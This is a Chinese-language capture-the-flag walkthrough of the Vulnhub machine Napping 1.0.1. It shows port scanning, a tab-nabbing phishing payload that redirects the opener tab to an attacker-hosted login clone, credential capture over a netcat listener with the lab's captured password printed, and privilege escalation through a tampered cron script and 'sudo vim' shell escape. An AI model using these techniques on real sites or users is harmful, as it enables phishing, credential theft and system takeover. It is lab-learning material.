Vulnhub 靶場 NAPPING: 1.0.1


前期准備:

靶機地址:https://www.vulnhub.com/entry/napping-101,752/

kali攻擊機ip:192.168.11.129
靶機地址:192.168.11.137

一、信息收集

1.使用nmap對靶機進行端口掃描

nmap -A -p 1-65535 192.168.11.137

image

發現開放了22和80端口。

2.收集80頁面的信息

image

發現是個登錄界面,還可以注冊,先注冊一個賬戶試試:

image

注冊完成后登錄進去:

image

發現有個輸入框,看樣子是提交連接,隨便寫入一個地址試試:

image

提交之后再點擊 Here 會跳轉到你輸入的連接:

image

查看源代碼,發現站點上的此特定 URL 鏈接功能容易受到 Tab Nabbing 的攻擊

image

二、漏洞攻擊

1.釣魚

知道了使用 Tab Nabbing 攻擊后,我們先做個釣魚界面,首先先復制登錄界面:

image

接下來,我們構建我們的惡意 html (sain.html)界面:

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.11.129:8000/index.html');
    </script>
</body>
</html>

把自己復制的 index.php 和 sain.html 頁面放到 /var/www/html 下,並且開啟 python3-http 服務,開的 80 端口,和 sain.html 中的端口區分開:

image

監聽惡意 html 中的 8000 端口, nc -lvvp 8000 在靶機的提交連接界面提交 python3-http 服務下的 sain.html 地址:

image

image

點擊提交即可,等了一會監聽的 8000 端口返回了數據包:

image

靶機中設定的隔幾分鍾就會用用戶登錄,此時我們獲取了數據包

username=daniel
password=C@ughtm3napping123

得到了用戶名和密碼,我們可以通過ssh進行登錄。

2.ssh登錄

image

查看一下用戶信息:

image

可以看到 daniel 是管理員組的一部分。

使用 find 我們可以查找任何我們可以使用命令訪問的有趣文件

find / -group administrators -type f 2>/dev/null

image

查看一下 query.py 文件:

image

根據site_status.txt文件,它似乎每 2 分鍾執行一次:

image

三、提權

我們需要先跳轉到 adrian 用戶,所以我們繼續在 /dev/shm 目錄中創建一個反向 shell bash 腳本:

image

直接運行的話還是 daniel 用戶,我們需要更改一下 query.py 這個個腳本來讓他定時反彈shell:

image

nc 監聽,等了一會得到反向shell:

image

獲得 adrian 用戶,查看以下權限:

image

發現可以再沒有在沒有密碼的情況下以 root 身份運行 vim ,那就直接寫入 Vim-shell

sudo /usr/bin/vim -c ':!/bin/sh'

image

得到root:

image


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM